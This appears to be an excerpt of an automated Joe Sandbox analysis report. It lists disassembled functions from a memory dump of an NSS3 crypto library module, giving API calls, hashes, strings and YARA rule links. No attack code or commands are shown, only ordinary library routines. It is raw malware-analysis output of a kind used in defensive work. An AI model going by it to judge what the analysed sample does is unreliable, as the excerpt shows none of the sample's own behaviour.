API ID: Util$Alloc_Item_free$AlgorithmDestroyErrorPolicyPublicSignatureWithZfreememcpy
String ID:
API String ID: 2730469119-0
Opcode ID: 08e1717c2716f5992761b12b3fb8e0323030c1c9a7917bdabb736e8cdc2e835a
Instruction ID: 396e8458f0b0834887d06342481b2e706e12f56f33606fae26801290b9a80ee8
Opcode Fuzzy Hash: 08e1717c2716f5992761b12b3fb8e0323030c1c9a7917bdabb736e8cdc2e835a
Instruction Fuzzy Hash: AC41D6756087019BEB18DF24EC45BAB77E9BF85310F098838E95A87240EF31E915C7E2

Function 6D54AC10 Relevance: 10.6, APIs: 7, Instructions: 121memoryCOMMON

Download Yara Rule

APIs

PK11_CreateContextBySymKey.NSS3(00000133,00000105,00000000,?,?,6D54AB3E,?,?,?), ref: 6D54AC35

Part of subcall function 6D52CEC0: PK11_FreeSymKey.NSS3(00000000), ref: 6D52CF16

PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?,?,6D54AB3E,?,?,?), ref: 6D54AC55

Part of subcall function 6D5610C0: TlsGetValue.KERNEL32(?,6D508802,00000000,00000008,?,6D4FEF74,00000000), ref: 6D5610F3
Part of subcall function 6D5610C0: EnterCriticalSection.KERNEL32(?,?,6D508802,00000000,00000008,?,6D4FEF74,00000000), ref: 6D56110C
Part of subcall function 6D5610C0: PL_ArenaAllocate.NSS3(?,?,?,6D508802,00000000,00000008,?,6D4FEF74,00000000), ref: 6D561141
Part of subcall function 6D5610C0: PR_Unlock.NSS3(?,?,?,6D508802,00000000,00000008,?,6D4FEF74,00000000), ref: 6D561182
Part of subcall function 6D5610C0: TlsGetValue.KERNEL32(?,6D508802,00000000,00000008,?,6D4FEF74,00000000), ref: 6D56119C

PK11_CipherOp.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,?,6D54AB3E,?,?), ref: 6D54AC70

Part of subcall function 6D52E300: TlsGetValue.KERNEL32 ref: 6D52E33C
Part of subcall function 6D52E300: EnterCriticalSection.KERNEL32(?), ref: 6D52E350
Part of subcall function 6D52E300: PR_Unlock.NSS3(?), ref: 6D52E5BC
Part of subcall function 6D52E300: PK11_GenerateRandom.NSS3(00000000,00000008), ref: 6D52E5CA
Part of subcall function 6D52E300: TlsGetValue.KERNEL32 ref: 6D52E5F2
Part of subcall function 6D52E300: EnterCriticalSection.KERNEL32(?), ref: 6D52E606
Part of subcall function 6D52E300: PORT_Alloc_Util.NSS3(?), ref: 6D52E613

PK11_GetBlockSize.NSS3(00000133,00000000), ref: 6D54AC92
PK11_DestroyContext.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,6D54AB3E), ref: 6D54ACD7
PORT_Alloc_Util.NSS3(?), ref: 6D54AD10
memcpy.VCRUNTIME140(00000000,?,FF850674), ref: 6D54AD2B

Part of subcall function 6D52F360: TlsGetValue.KERNEL32(00000000,?,6D54A904,?), ref: 6D52F38B
Part of subcall function 6D52F360: EnterCriticalSection.KERNEL32(?,?,?,6D54A904,?), ref: 6D52F3A0
Part of subcall function 6D52F360: PR_Unlock.NSS3(?,?,?,?,6D54A904,?), ref: 6D52F3D3

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: K11_$Value$CriticalEnterSection$Alloc_UnlockUtil$ArenaContext$AllocateBlockCipherCreateDestroyFreeGenerateRandomSizememcpy
String ID:
API String ID: 2926855110-0
Opcode ID: 7474951bbb9832e775f90f844f590bd93efe6c46321550cba09810ada0f91971
Instruction ID: a7b10889033278fd69bb2485ff155e4fd04877e2ef595073be71ad9262c156e3
Opcode Fuzzy Hash: 7474951bbb9832e775f90f844f590bd93efe6c46321550cba09810ada0f91971
Instruction Fuzzy Hash: AC3115B1A042065BEB48CF698C419BE76B6AFC432CB05C538E9159B741EB31ED1187A2

Function 6D502920 Relevance: 10.6, APIs: 7, Instructions: 121timeCOMMON

Download Yara Rule

APIs

DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6D50294E

Part of subcall function 6D561820: DER_GeneralizedTimeToTime_Util.NSS3(?,?,?,6D501D97,?,?), ref: 6D561836

DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6D50296A
DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6D502991

Part of subcall function 6D561820: PR_SetError.NSS3(FFFFE005,00000000,?,6D501D97,?,?), ref: 6D56184D

DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6D5029AF
PR_Now.NSS3 ref: 6D502A29
PR_SetError.NSS3(FFFFE005,00000000), ref: 6D502A50
PR_SetError.NSS3(FFFFE005,00000000), ref: 6D502A79

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: TimeUtil$Choice_Decode$Error$GeneralizedTime_
String ID:
API String ID: 2509447271-0
Opcode ID: e1890cc138df460819d1689b52b0f28c8e5f39eb7bcb2616608cdc1335e75f1b
Instruction ID: 30f6f71f876c9e073137d652b2f0105a541a27d801f50cf102b0a7a50f40f542
Opcode Fuzzy Hash: e1890cc138df460819d1689b52b0f28c8e5f39eb7bcb2616608cdc1335e75f1b
Instruction Fuzzy Hash: 24419671A08351AFC728CF28C840A5FB7E5AFD8754F054A2DF99893700EB30ED098792

Function 6D528C70 Relevance: 10.6, APIs: 7, Instructions: 110stringCOMMON

Download Yara Rule

APIs

PR_Now.NSS3 ref: 6D528C7C

Part of subcall function 6D5C9DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6D610A27), ref: 6D5C9DC6
Part of subcall function 6D5C9DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6D610A27), ref: 6D5C9DD1
Part of subcall function 6D5C9DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6D5C9DED

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6D528CB0
TlsGetValue.KERNEL32 ref: 6D528CD1
EnterCriticalSection.KERNEL32(?), ref: 6D528CE5
PR_Unlock.NSS3(?), ref: 6D528D2E
PR_SetError.NSS3(FFFFE00F,00000000), ref: 6D528D62
PR_SetError.NSS3(FFFFE005,00000000), ref: 6D528D93

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: Time$ErrorSystem$CriticalEnterFileSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strlen
String ID:
API String ID: 3131193014-0
Opcode ID: c9dc1bb7920d2ff6797a2b973847b97e1144b46d50feb519b3ab8f759caa4eb6
Instruction ID: de1a82e940f3d30c72bcd11b68d7cce6b856770aa0d1676caf1121ae99fcffae
Opcode Fuzzy Hash: c9dc1bb7920d2ff6797a2b973847b97e1144b46d50feb519b3ab8f759caa4eb6
Instruction Fuzzy Hash: 5D314871904212AFEB089FA9DC407AA7BB0BF55314F140639EA1A67F90D770A96CC7C2

Function 6D569D60 Relevance: 10.6, APIs: 7, Instructions: 108memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?,00000000,?,?,00000000,?,6D569C5B), ref: 6D569D82

Part of subcall function 6D5614C0: TlsGetValue.KERNEL32 ref: 6D5614E0
Part of subcall function 6D5614C0: EnterCriticalSection.KERNEL32 ref: 6D5614F5
Part of subcall function 6D5614C0: PR_Unlock.NSS3 ref: 6D56150D

PORT_ArenaGrow_Util.NSS3(?,?,00000000,?,6D569C5B), ref: 6D569DA9

Part of subcall function 6D561340: TlsGetValue.KERNEL32(?,00000000,00000000,?,6D50895A,00000000,?,00000000,?,00000000,?,00000000,?,6D4FF599,?,00000000), ref: 6D56136A
Part of subcall function 6D561340: EnterCriticalSection.KERNEL32(B8AC9BDF,?,6D50895A,00000000,?,00000000,?,00000000,?,00000000,?,6D4FF599,?,00000000), ref: 6D56137E
Part of subcall function 6D561340: PL_ArenaGrow.NSS3(?,6D4FF599,?,00000000,?,6D50895A,00000000,?,00000000,?,00000000,?,00000000,?,6D4FF599,?), ref: 6D5613CF
Part of subcall function 6D561340: PR_Unlock.NSS3(?,?,6D50895A,00000000,?,00000000,?,00000000,?,00000000,?,6D4FF599,?,00000000), ref: 6D56145C

PORT_ArenaGrow_Util.NSS3(?,?,?,?,?,?,?,?,6D569C5B), ref: 6D569DCE

Part of subcall function 6D561340: TlsGetValue.KERNEL32(?,00000000,00000000,?,6D50895A,00000000,?,00000000,?,00000000,?,00000000,?,6D4FF599,?,00000000), ref: 6D5613F0
Part of subcall function 6D561340: PL_ArenaGrow.NSS3(?,6D4FF599,?,?,?,00000000,00000000,?,6D50895A,00000000,?,00000000,?,00000000,?,00000000), ref: 6D561445

PORT_ArenaAlloc_Util.NSS3(?,00000008,6D569C5B), ref: 6D569DDC
PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,6D569C5B), ref: 6D569DFE
PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,6D569C5B), ref: 6D569E43
PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,6D569C5B), ref: 6D569E91

Part of subcall function 6D5AC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6D5AC2BF

Part of subcall function 6D561560: TlsGetValue.KERNEL32(00000000,00000000,?,?,?,6D55FAAB,00000000), ref: 6D56157E
Part of subcall function 6D561560: EnterCriticalSection.KERNEL32(B8AC9BDF,?,6D55FAAB,00000000), ref: 6D561592
Part of subcall function 6D561560: memset.VCRUNTIME140(?,00000000,?), ref: 6D561600
Part of subcall function 6D561560: PL_ArenaRelease.NSS3(?,?), ref: 6D561620
Part of subcall function 6D561560: PR_Unlock.NSS3(?), ref: 6D561639

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: Arena$Util$Value$Alloc_CriticalEnterSectionUnlock$GrowGrow_$ErrorMark_Releasememset
String ID:
API String ID: 3425318038-0
Opcode ID: ec09ca6b5ba00fa30881863b7796f78fa7ddeeb76bf669e4abd50a1f8de51863
Instruction ID: d4753fc50939e846ac5bf1103f315e08000a6f78830d3728cf50188ff28e3ece
Opcode Fuzzy Hash: ec09ca6b5ba00fa30881863b7796f78fa7ddeeb76bf669e4abd50a1f8de51863
Instruction Fuzzy Hash: 9F4182B4600646AFE748CF15D940F62BBA1FF45358F158528D9188BEB0EB72E934CFA0

Function 6D52DDD0 Relevance: 10.6, APIs: 7, Instructions: 106COMMON

Download Yara Rule

APIs

SECOID_FindOIDByTag_Util.NSS3(?), ref: 6D52DDEC

Part of subcall function 6D560840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6D5608B4

PK11_DigestBegin.NSS3(00000000), ref: 6D52DE70
PK11_DigestOp.NSS3(00000000,00000004,00000000), ref: 6D52DE83
HASH_ResultLenByOidTag.NSS3(?), ref: 6D52DE95
PK11_DigestFinal.NSS3(00000000,00000000,?,00000040), ref: 6D52DEAE
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6D52DEBB
PR_SetError.NSS3(FFFFE005,00000000), ref: 6D52DECC

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: K11_$Digest$Error$BeginContextDestroyFinalFindResultTag_Util
String ID:
API String ID: 1091488953-0
Opcode ID: b227e6b9ac43a1692282deed0fa4ee64e2c8f8b543c79edb9e138dcb5cf073c9
Instruction ID: 5bd0bc07c192534f530def7a08039f01f7f06b196cc599e9a6c322234ccfffcb
Opcode Fuzzy Hash: b227e6b9ac43a1692282deed0fa4ee64e2c8f8b543c79edb9e138dcb5cf073c9
Instruction Fuzzy Hash: 5B314DB29041156BDB04AF28AC41B7B76B8EFD0318F060536ED09A7681F731DD18C6E2

Function 6D55DC10 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,00000000,?,?,00000000,?,?,6D55D9E4,00000000), ref: 6D55DC30
PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,00000000,?,?,6D55D9E4,00000000), ref: 6D55DC4E
PORT_Alloc_Util.NSS3(0000000C,?,?,00000000,?,?,6D55D9E4,00000000), ref: 6D55DC5A
PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6D55DC7E
memcpy.VCRUNTIME140(00000000,?,?), ref: 6D55DCAD

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: Alloc_Util$Arenamemcpy
String ID:
API String ID: 2632744278-0
Opcode ID: 07e3afc9a50a5294e015b5ea3c67191d694a833a1805c81745f2d60b6201c78d
Instruction ID: c5fadce1cfa1cff0da72e5bcc0f164b21681127fd6dd9b158b59032d38c382a3
Opcode Fuzzy Hash: 07e3afc9a50a5294e015b5ea3c67191d694a833a1805c81745f2d60b6201c78d
Instruction Fuzzy Hash: FB316EB69042029FE715CF1DD884A66B7F8AF85354F14882AE948CBA11E772E950CB61

Function 6D522E40 Relevance: 10.6, APIs: 7, Instructions: 92COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,00000000,00000038,?,6D51E728,?,00000038,?,?,00000000), ref: 6D522E52
EnterCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6D522E66
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6D522E7B
EnterCriticalSection.KERNEL32(00000000), ref: 6D522E8F
PL_HashTableLookup.NSS3(?,?), ref: 6D522E9E
PR_Unlock.NSS3(?), ref: 6D522EAB
PR_Unlock.NSS3(?), ref: 6D522F0D

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValue$HashLookupTable
String ID:
API String ID: 3106257965-0
Opcode ID: 38d3599f78ff1715e566c81c9a13e6823030a1bc738f74f66dddc505937a5ae2
Instruction ID: 8f790ce3561c0db361ecf7f5a51f497357e36bfa67507bd9dba446af6de3b70d
Opcode Fuzzy Hash: 38d3599f78ff1715e566c81c9a13e6823030a1bc738f74f66dddc505937a5ae2
Instruction Fuzzy Hash: AB31587A900106ABEF059F29DC8197AB774FF85258B058574ED08C7A21FB31EC64C7D1

Function 6D56CEE0 Relevance: 10.6, APIs: 7, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?,6D56CD93,?), ref: 6D56CEEE

Part of subcall function 6D5614C0: TlsGetValue.KERNEL32 ref: 6D5614E0
Part of subcall function 6D5614C0: EnterCriticalSection.KERNEL32 ref: 6D5614F5
Part of subcall function 6D5614C0: PR_Unlock.NSS3 ref: 6D56150D

PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6D56CD93,?), ref: 6D56CEFC

Part of subcall function 6D5610C0: TlsGetValue.KERNEL32(?,6D508802,00000000,00000008,?,6D4FEF74,00000000), ref: 6D5610F3
Part of subcall function 6D5610C0: EnterCriticalSection.KERNEL32(?,?,6D508802,00000000,00000008,?,6D4FEF74,00000000), ref: 6D56110C
Part of subcall function 6D5610C0: PL_ArenaAllocate.NSS3(?,?,?,6D508802,00000000,00000008,?,6D4FEF74,00000000), ref: 6D561141
Part of subcall function 6D5610C0: PR_Unlock.NSS3(?,?,?,6D508802,00000000,00000008,?,6D4FEF74,00000000), ref: 6D561182
Part of subcall function 6D5610C0: TlsGetValue.KERNEL32(?,6D508802,00000000,00000008,?,6D4FEF74,00000000), ref: 6D56119C

SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6D56CD93,?), ref: 6D56CF0B

Part of subcall function 6D560840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6D5608B4

SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6D56CD93,?), ref: 6D56CF1D

Part of subcall function 6D55FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6D558D2D,?,00000000,?), ref: 6D55FB85
Part of subcall function 6D55FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6D55FBB1

PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6D56CD93,?), ref: 6D56CF47
PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6D56CD93,?), ref: 6D56CF67
SECITEM_CopyItem_Util.NSS3(?,00000000,6D56CD93,?,?,?,?,?,?,?,?,?,?,?,6D56CD93,?), ref: 6D56CF78

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: Util$Arena$Alloc_$Value$CopyCriticalEnterItem_SectionUnlock$AllocateErrorFindMark_Tag_memcpy
String ID:
API String ID: 4291907967-0
Opcode ID: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
Instruction ID: f84bce3142dc0f38523584205890e0d201882c29dcabcb0c5199c76090ff3c2b
Opcode Fuzzy Hash: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
Instruction Fuzzy Hash: B711E4B1E083415BEF189ABA7C41B3BBAEC9F9415AF01443AEE09D7651FB60DD04C6B1

Function 6D518C00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6D518C1B
EnterCriticalSection.KERNEL32 ref: 6D518C34
PL_ArenaAllocate.NSS3 ref: 6D518C65
PR_Unlock.NSS3 ref: 6D518C9C
PR_Unlock.NSS3 ref: 6D518CB6

Part of subcall function 6D5ADD70: TlsGetValue.KERNEL32 ref: 6D5ADD8C
Part of subcall function 6D5ADD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6D5ADDB4

Strings

KRAM, xrefs: 6D518C8F

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: CriticalSectionUnlockValue$AllocateArenaEnterLeave
String ID: KRAM
API String ID: 4127063985-3815160215
Opcode ID: 81cf1476be0338d586d4f05289c5183a8acd63f93dc684f870e2a04cc3491847
Instruction ID: 6807a7c655b53c5ae11bc86819b4f35152d084900d872f6404342b847e222148
Opcode Fuzzy Hash: 81cf1476be0338d586d4f05289c5183a8acd63f93dc684f870e2a04cc3491847
Instruction Fuzzy Hash: 612162B59186019FE704EF79C884629BBF4FF45308F06896AD9888B711EB34D885CBD2

Function 6D528E80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

PK11_GetInternalKeySlot.NSS3(?,?,?,6D542E62,?,?,?,?,?,?,?,00000000,?,?,?,6D514F1C), ref: 6D528EA2

Part of subcall function 6D54F820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6D54F854
Part of subcall function 6D54F820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6D54F868
Part of subcall function 6D54F820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6D54F882
Part of subcall function 6D54F820: free.MOZGLUE(04C483FF,?,?), ref: 6D54F889
Part of subcall function 6D54F820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6D54F8A4
Part of subcall function 6D54F820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6D54F8AB
Part of subcall function 6D54F820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6D54F8C9
Part of subcall function 6D54F820: free.MOZGLUE(280F10EC,?,?), ref: 6D54F8D0

PK11_IsLoggedIn.NSS3(?,?,?,6D542E62,?,?,?,?,?,?,?,00000000,?,?,?,6D514F1C), ref: 6D528EC3
TlsGetValue.KERNEL32(?,?,?,6D542E62,?,?,?,?,?,?,?,00000000,?,?,?,6D514F1C), ref: 6D528EDC
EnterCriticalSection.KERNEL32(?,?,?,?,6D542E62,?,?,?,?,?,?,?,00000000,?,?), ref: 6D528EF1
PR_Unlock.NSS3 ref: 6D528F20

Strings

b.Tm, xrefs: 6D528E96, 6D528F25

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: free$CriticalSection$Delete$K11_$EnterInternalLoggedSlotUnlockValue
String ID: b.Tm
API String ID: 1978757487-1869352651
Opcode ID: d354e6f5a9928f5d7bcfc4709308815b10372c28d167950551b66f9053017413
Instruction ID: cd26e47d201cddc62ae14d9c10369d7278d9cfda71e5c833417657ef7c58b870
Opcode Fuzzy Hash: d354e6f5a9928f5d7bcfc4709308815b10372c28d167950551b66f9053017413
Instruction Fuzzy Hash: 54215E719086069FD708AF69D484669BBF0FF48324F02496EED9897B81D730EC54CBD2

Function 6D558970 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,00000000,6D5061C4,?,6D505639,00000000), ref: 6D558991
TlsGetValue.KERNEL32(?,?,?,?,?,6D505639,00000000), ref: 6D5589AD
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6D505639,00000000), ref: 6D5589C6
PR_WaitCondVar.NSS3 ref: 6D5589F7
PR_Unlock.NSS3(?,?,?,?,?,?,?,6D505639,00000000), ref: 6D558A0C

Part of subcall function 6D4F07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6D48204A), ref: 6D4F07AD
Part of subcall function 6D4F07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6D48204A), ref: 6D4F07CD
Part of subcall function 6D4F07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6D48204A), ref: 6D4F07D6
Part of subcall function 6D4F07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6D48204A), ref: 6D4F07E4
Part of subcall function 6D4F07A0: TlsSetValue.KERNEL32(00000000,?,6D48204A), ref: 6D4F0864
Part of subcall function 6D4F07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6D4F0880
